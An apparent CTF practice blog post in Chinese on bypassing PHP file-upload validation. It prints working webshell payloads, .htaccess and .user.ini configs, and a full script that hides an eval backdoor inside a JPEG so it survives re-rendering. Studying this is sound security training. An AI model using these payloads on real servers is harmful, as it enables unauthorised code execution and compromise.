【文件上传waf绕过练习】

已于 2024-06-17 20:58:26 修改
阅读量828 收藏 30
点赞数 7
分类专栏: CTF 文章标签: php nginx 后端
于 2024-06-17 20:57:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45131319/article/details/139480716
版权

目录

一、常见文件上传校验姿势

1、前端客户端校验

请添加图片描述

2、后端服务端校验

content-type 校验

请添加图片描述
后端获取的 content-type 通常是请求头中的参数:
请添加图片描述
获取后判断是否为jpeg、png、gif 进行限制,这种方式也是很危险的可以通过修改请求头绕过。

getimagesize 校验

文件内容头校验
请添加图片描述
如果我们getimagesize传入的是一张图片就会返回以下的内容:
请添加图片描述
可以看到包含了图片的信息,但是如果传入的不是图片,而是一个文本,则会出现一下内容并返回一个布尔值false:
请添加图片描述
所以通过getimagesize只需要做一个简单的判断就可以对上传的文件进行限制

文件的后缀名校验:

后缀名主要有白名单和黑名单校验,使用白名单会更安全

黑名单示例代码如下:

请添加图片描述
deny_ext 是黑名单列表
file_name 获取的文件名

把获取到的文件名去和黑名单列表匹配,如果在的话就拒绝,如果不在的话就允许

这种它只限制了一些文件,我们可以通过上传配置文件来绕过

二、常见文件上传绕过姿势

前端客户端校验绕过

这是一个前端校验的例子
请添加图片描述
我们查看一下源码发现表单在被提交后触发了一个chekfile的函数校验:
请添加图片描述
chekfile函数的内容如下,会先获取upload_file的文件名,如果文件是空则提示需要上传的文件,allow_ext 定义了一个白名单然后就是获取文件后缀看看在不在白名单里面:
请添加图片描述
首先我们先准备一个eval.php文件,内容如下:

<?php
phpinfo();
?>

接着我们把后缀名改为eval.jpg ,然后在进行上传,因为后缀是jpg所以前端的校验就给绕过去:
请添加图片描述
抓个包,并把包里的文件名改为eval.php,这个时候释放包,就会发现文件成功上传到/upload/eval.php 的路径里面:
请添加图片描述
我们再访问一下,就成功的解析了:
请添加图片描述

content-type 校验绕过

我们接着用之前的 eval.php , 抓个包拦截一下查看一下 content-type 类型:
请添加图片描述
后端的校验就是判断 content-type 是不是图片类型:
请添加图片描述
把我们拦截到的包的类型改成图片的类型就可以了,比如说改成image/jpeg 我们再释放一下包就成功绕过了:

请添加图片描述

getimagesize 校验绕过

请添加图片描述
请添加图片描述
请添加图片描述
gif的文件头因为不需要用二进制编辑工具去修改内容,我们可以直接用记事本直接添加 gif89a 所以比较常用,下面我们再看到例题:
请添加图片描述
首先获取上传路径,再拼接文件名,获取一下文件信息,再判断后缀是否为jpg jpeg png z 再用getimagesize 判断一下是否为图片是图片就上传不是就不上传,我们只需要在文件头加上GIF89a就成功绕过上传成功:
请添加图片描述

特殊后缀名绕过

请添加图片描述
apache 配置的问题,上图的正则如果是上面列举的,就会用hadler去解析,这个正则是php3 php4 php5,我们直接上传一个php3试试,上传成功后就会解析成php:
请添加图片描述

上传配置文件绕过

.htaccess

请添加图片描述

比如上面的一个正则它会匹配后缀名为.aaa的文件 设置一个 php Handler 这样,所有为.aaa后缀的文件都会被php解析,我们看一到例题,分析源码发现文件的过滤规则是判断上传文件的后缀名是否在黑名单里面:

请添加图片描述
由于windows文件不能直接写 .htaccess 所以我们写成1.htaccess 用记事本打开并写入:
请添加图片描述

<FilesMatch ".+\.aaa$">
	SetHandler application/x-httpd-php
</FilesMatch>

该代码的意思是匹配后缀为.aaa的文件解析为php,我们抓包之后上传把1去掉,就上传了.htaccess,代码里匹配的是.aaa后缀的文件,那么我们还需要上传一个.aaa后缀的文件,我们接着用eval.php 把后缀改为.aaa 成功上传后打开该文件就成功被解析执行了:
请添加图片描述

.user.ini

请添加图片描述
payload

auto_prepend_file=111.jpg  #在文件的第一行包含111.jpg
auto_append_file=111.jpg   #在文件的最后一行包含111.jpg

请添加图片描述
我们现在例题中尝试上传eval.php:
请添加图片描述
提示非法后缀,改成jpg试试:
请添加图片描述
显示有<?在我们上传的内容中,那么把<?都去掉试试:
请添加图片描述
提示不是图片,那么我们加上GIF89a试试:
请添加图片描述
成功上传,并且给我们返回了一个当前目录的列表,我们看到有index.php,我们就可以用.user.ini 来触发php文件,我们创建并往 .user.ini 写入以下代码,再上传到服务器上:

GIF89a
auto_prepend_file=111.jpg

我们再新建一个111.jpg,因为111.jpg是会被.user.ini包含到index.php运行之前先运行,相当于在index.php里的第一行写了一句include(‘111.jpg’)然后使用记事本打开写入以下代码并上传:

GIF89a
<script language="php">
    system($_GET[a]);
</script>

上传后发现<?被过滤了,那么我们就只能换一个方式:

请添加图片描述我们需要这么写,这样就可以绕过服务器的校验,然后再上传一下:

GIF89a
<script language="php">
    system($_GET[a]);
</script>

我们接着访问index.php,往a里传参,就成功执行了payload:
请添加图片描述

大小写的绕过练习:

我们直接看例题,源码里面只对小写p和大写H进行了过滤,那么我们可以用phP这样的大小写顺序来绕过校验:

请添加图片描述
改好后缀直接上传,上传成功:
请添加图片描述

双写绕过

依然是一个黑名单,只不过它对黑名单中处理不再是直接拒绝,而是把黑名单中的后缀替换为空:
请添加图片描述

我们在php后缀中再写入一个php,那么当php被替换为空的时候那么后缀依旧是php:
请添加图片描述

二次渲染绕过

题目中在获取到文件后缀名后判断是否为jpg与文件类型是否为image类型, 同样的代码还有判断是否为png、gif,如果都不是则文件上传出错,它首先会把上传的文件移动到目标路径,然后用imagecreatefromjpeg去进行二次渲染,如果渲染失败的话就删除这个上传后的文件,如果成就生成一个随机文件名,然后在目标路径里生成二次渲染后的新文件,再删掉上传后的文件,那么我们服务器使用的是二次渲染后端 文件,之后就完成整个上传动作:
请添加图片描述
找出我们上传之前和渲染之后的共同点,之后我们可以在共同点里插入一些长度的代码,我们可以借助工具010 Editor 来进行比较,我们在打开软件后勾选下图的配置,就可以在滚动查看二进制代码的时候两个文件同步滚动:
请添加图片描述
我们需要注意的是下面的内容,不同点和相同点:
请添加图片描述
我们最好把下载后的图片再上传上去,然后再拿第一次下载的图片和二次上传再下载后的图片进行对比,因为它会在原始文件上加上了一些代码,所以会有一些偏差:
请添加图片描述
我们用第一次上传的图片和第二次上传的图片进行对比,这样的话格式就会相同,方便我们去比较,但是如果你想人工去更改的话,可能不会成功,所以我们可以用这样一个脚本:

<?php

    $miniPayload = "<?php eval(\$_POST[a])?>";

    if(!extension_loaded('gd') || !function_exists('imagecreatefromjpeg')) {
        die('php-gd is not installed');
    }

    if(!isset($argv[1])) {
        die('php jpg_payload.php <jpg_name.jpg>');
    }

    set_error_handler("custom_error_handler");

    for($pad = 0; $pad < 1024; $pad++) {
        $nullbytePayloadSize = $pad;
        $dis = new DataInputStream($argv[1]);
        $outStream = file_get_contents($argv[1]);
        $extraBytes = 0;
        $correctImage = TRUE;

        if($dis->readShort() != 0xFFD8) {
            die('Incorrect SOI marker');
        }

        while((!$dis->eof()) && ($dis->readByte() == 0xFF)) {
            $marker = $dis->readByte();
            $size = $dis->readShort() - 2;
            $dis->skip($size);
            if($marker === 0xDA) {
                $startPos = $dis->seek();
                $outStreamTmp = 
                    substr($outStream, 0, $startPos) . 
                    $miniPayload . 
                    str_repeat("\0",$nullbytePayloadSize) . 
                    substr($outStream, $startPos);
                checkImage('_'.$argv[1], $outStreamTmp, TRUE);
                if($extraBytes !== 0) {
                    while((!$dis->eof())) {
                        if($dis->readByte() === 0xFF) {
                            if($dis->readByte !== 0x00) {
                                break;
                            }
                        }
                    }
                    $stopPos = $dis->seek() - 2;
                    $imageStreamSize = $stopPos - $startPos;
                    $outStream = 
                        substr($outStream, 0, $startPos) . 
                        $miniPayload . 
                        substr(
                            str_repeat("\0",$nullbytePayloadSize).
                                substr($outStream, $startPos, $imageStreamSize),
                            0,
                            $nullbytePayloadSize+$imageStreamSize-$extraBytes) . 
                                substr($outStream, $stopPos);
                } elseif($correctImage) {
                    $outStream = $outStreamTmp;
                } else {
                    break;
                }
                if(checkImage('payload_'.$argv[1], $outStream)) {
                    die('Success!');
                } else {
                    break;
                }
            }
        }
    }
    unlink('payload_'.$argv[1]);
    die('Something\'s wrong');

    function checkImage($filename, $data, $unlink = FALSE) {
        global $correctImage;
        file_put_contents($filename, $data);
        $correctImage = TRUE;
        imagecreatefromjpeg($filename);
        if($unlink)
            unlink($filename);
        return $correctImage;
    }

    function custom_error_handler($errno, $errstr, $errfile, $errline) {
        global $extraBytes, $correctImage;
        $correctImage = FALSE;
        if(preg_match('/(\d+) extraneous bytes before marker/', $errstr, $m)) {
            if(isset($m[1])) {
                $extraBytes = (int)$m[1];
            }
        }
    }

    class DataInputStream {
        private $binData;
        private $order;
        private $size;

        public function __construct($filename, $order = false, $fromString = false) {
            $this->binData = '';
            $this->order = $order;
            if(!$fromString) {
                if(!file_exists($filename) || !is_file($filename))
                    die('File not exists ['.$filename.']');
                $this->binData = file_get_contents($filename);
            } else {
                $this->binData = $filename;
            }
            $this->size = strlen($this->binData);
        }

        public function seek() {
            return ($this->size - strlen($this->binData));
        }

        public function skip($skip) {
            $this->binData = substr($this->binData, $skip);
        }

        public function readByte() {
            if($this->eof()) {
                die('End Of File');
            }
            $byte = substr($this->binData, 0, 1);
            $this->binData = substr($this->binData, 1);
            return ord($byte);
        }

        public function readShort() {
            if(strlen($this->binData) < 2) {
                die('End Of File');
            }
            $short = substr($this->binData, 0, 2);
            $this->binData = substr($this->binData, 2);
            if($this->order) {
                $short = (ord($short[1]) << 8) + ord($short[0]);
            } else {
                $short = (ord($short[0]) << 8) + ord($short[1]);
            }
            return $short;
        }

        public function eof() {
            return !$this->binData||(strlen($this->binData) === 0);
        }
    }
?>

这段代码的作用就是把phpinfo插入到图片中,并使图片二次渲染后,依旧保留插入的代码,运行后我们再上传下载下来看看有没有phpinfo:
请添加图片描述
成功插入了payload

利用服务器特性进行绕过

Apache

请添加图片描述
请添加图片描述
name变量会将post发送的数据作为文件名,然后是黑名单,我们上传一个文件,然后抓包拦截一下,我们再eval.php后面加一个空格 方便我们等一下找20修改成0a:
请添加图片描述
我们把这里的20空格改成0a换行,然后上传就可以了:
请添加图片描述
我们打开文件看到成功解析,注意这里的文件名后缀需要加上%0A:
请添加图片描述

请添加图片描述

我们上传一个test.php
请添加图片描述
抓包后加上.jpg的后缀

请添加图片描述
文件成功上传,我们再打开:
请添加图片描述
它就会被解析为php:
请添加图片描述

Nginx

请添加图片描述
我们上传一个文件拦截一下,在文件名后面加上一个空格,放行后成功上传:
请添加图片描述
我们在文件名后面加上两个空格,其中一个20空格改成00:
请添加图片描述
再返回url那里,加上.php,就会被成功解析为php:
请添加图片描述
请添加图片描述
我们上传一个test.php,拦截包后修改后缀、content-type、记上文件头,成功上传:
请添加图片描述
我们访问文件时只需要在后面加上/.php 就能成功解析出来
请添加图片描述

盖头盖
关注
  • 7
    点赞
  • 30
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WAF绕过的各种方法总结.pdf
07-09
WAF绕过的各种方法总结总结语2019年7月9日,仅供学习参考,请勿用于非法用途
web安全-数据包参数内容简介-文件上传WAF(安全狗)绕过方法
ran的博客
02-03 1260
由编成的知识可以知道一个语句结束的末尾需要添加分号,而参数filename的后面没有分号,由此可知这一整条语句可能到filename就截止了,由此可以猜想如果filename后面加一个分号以后,其后面就可能还可以添加其它内容。因为安全狗的匹配机制是匹配双引号里的内容,但是这里的双引号有前没有后,它就一直在找后面的那个双引号,但是没有找到,所以可能没有匹配到。有的参数值加了双引号,有的参数值没加双引号,由此可以想到加了双引号的就是可以随便修改的,而没加双引号的可能就是有着固定的一些参数值。
WAF绕过文件上传
Williamanddog的博客
02-05 1186
我们上传1.txt文件,抓包修改content-type为:application/octet-stream。那我们通过hackbar来验证,利用免杀一句话木马成功执行命令。接下来我们在判断是否是通过content-type来进行拦截。修改了1.txt的content-type也可以成功上传。所以可以判断,WAF是根据文件名后缀来进行拦截的。我们在请求包中插入足够多的无用数据,成功上传。但是我们并不知道waf拦截我们的机制。我们访问上传的一句话木马被拦截。我们上传一个一句话木马,被拦截。
Web安全基础学习:文件上传漏洞之后端校验类型
最新发布
qq_51862722的博客
06-23 698
文件上传漏洞:字如其意,就是可能出现在一切允许上传文件的功能点。它是指由于程序员未对上传的文件进行严格的验证和过滤,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。这种攻击方式是最为直接和有效的,“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。
文件上传WAF拦截的绕过方式
qq_56228347的博客
11-24 2905
文件上传WAF拦截的绕过方式
WAF Bypass】文件上传绕过waf姿势总结
m0_46103905的博客
06-01 1746
总结了文件上传waf的一些姿势,以及针对网站安全狗进行了实战演练。
文件上传与sql注入绕过WAF
dys的博客
06-19 535
文件上传与sql注入绕过waf
文件上传漏洞基础/content-type绕过/黑名单绕过/
ChenD的学习笔记
10-21 4851
有些上传模块,会对http的类型头进行检测,如果是图片类型,允许上传文件到服务器,否则返回上传失败。在后端检测了上传文件的content-type是不是图片格式,也就是说,我们前面用的删掉前端函数,直接上传方式是用不了的,我们需要发送数据包中的content-type为image/png。①修改脚本后缀,上传,抓包中修改后缀(因为上传的就是图片,所以content-type就是image/png)②直接上传脚本,抓包中直接修改conent-type。②直接上传脚本修改content-type。
WAF绕过神器
12-14
顾名思义,铁鹰所创建的一款WAF绕过神器1.0版本。。。
2022年文件上传漏洞绕过姿势整理,过waf
11-20
2022年文件上传漏洞绕过姿势整理,过waf版,绕过思路:对文件的内容,数据。数据包进行处理。2.通过替换大小写来进行绕过
长亭waf绕过1.pdf
07-09
长亭waf绕过1
waf是如何被绕过
12-30
介绍了白名单绕过、IP段白名单绕过绕过代理直接请求源站(代理模式云WAF)等绕过方式。适合初学者进行学习,不适合高手。
文件上传漏洞WAF绕过方法
永远是少年
10-09 1851
今天继续给大家介绍渗透测试相关知识,本文主要文件上传漏洞WAF绕过方法。 一、文件上传数据包解析 二、文件上传WAF防御逻辑 三、文件上传常见绕过方式 四、写在最后
WEB漏洞-文件上传WAF绕过及安全修复
qq_54190167的博客
04-11 874
WEB漏洞-文件上传WAF绕过及安全修复
10-java实现对上传文件做安全性检查
CAT
03-14 9458
文件安全性检查
文件上传绕过waf
None安全团队
12-16 3928
前言 在这个waf横行的年代,绕waf花的时间比找漏洞还多,有时候好不容易找到个突破口,可惜被waf拦得死死的。。。 这里总结下我个人常用的文件上传绕过waf的方法,希望能起到抛砖引玉的效果,得到大佬们指点下。 常见情况 下面总结下我经常遇到的情况: 一. 检测文件扩展名 很多waf在上传文件的时候会检测文件扩展名,这个时候又能细分几种情况来绕过。 1. 寻找黑名单之外的扩展名 比如aspx被拦截,来个ashx就行了;jsp被拦截可以试试jspx、JSp等等。这个简单,无需赘述。 2. 构造
文件上传漏洞
金色%夕阳的博客
04-29 2319
文件上传漏洞 1. 文件上传功能 文件上传功能是大部分WEB应用的必备功能,站点常见文件上传点有:用户头像上传、社交类网站允许用户上传照片、服务类网站需要用户上传证明材料的电子档、电商类网站允许用户上传图片展示商品情况等。然而,看似普通的文件上传功能如果缺法安全防护措施,就存在巨大的安全风险。 2. 文件上传漏洞 文件上传漏洞是指攻击者上传了一个可执行的文件到服务器并执行。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。通常是因web应用程序没有对上传的文件进行安全判断或者判断条件不够严谨,
文件上传常用绕过方式
陈艺秋的博客
07-09 3200
这里能绕过的原理是因为windows的NTFS文件系统的一个特性,windows都适用在window的时候如果文件名+::$DATA会把::$DATA之后的数据当成文件流处理,不会检测后缀名且保持::$DATA之前的文件名,他的目的就是不检查后缀名也就是当我们访问时,也就是相当于访问a.php本身当我们访问时,也就是访问ab文件夹下的a.php文件本身。
WAF绕过-漏洞利用篇-sql注入+文件上传-过狗
xiaoheizi的博客
08-05 479
硬件型WAF以一个独立的硬件设备的形态存在,支持以多种方式(如透明桥接模式、旁路模式、反向代理等)部署到网络中为后端的Web应用提供安全防护,是最为传统的WAF型态,在受访企业中部署占比为35.2%。国内的绿盟、安恒、启明星辰等老牌厂商旗下的WAF都属于此类。随着云计算技术的快速发展,使得基于云的WAF实现成为可能,在本次调查中占比甚至超过了传统的硬件WAF跃升为第一位,达到39.4%。就是来自网站内部的过滤,直接出现在网站代码中,比如说对输入的参数强制类转换啊,对输入的参数进行敏感词检测啊什么的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值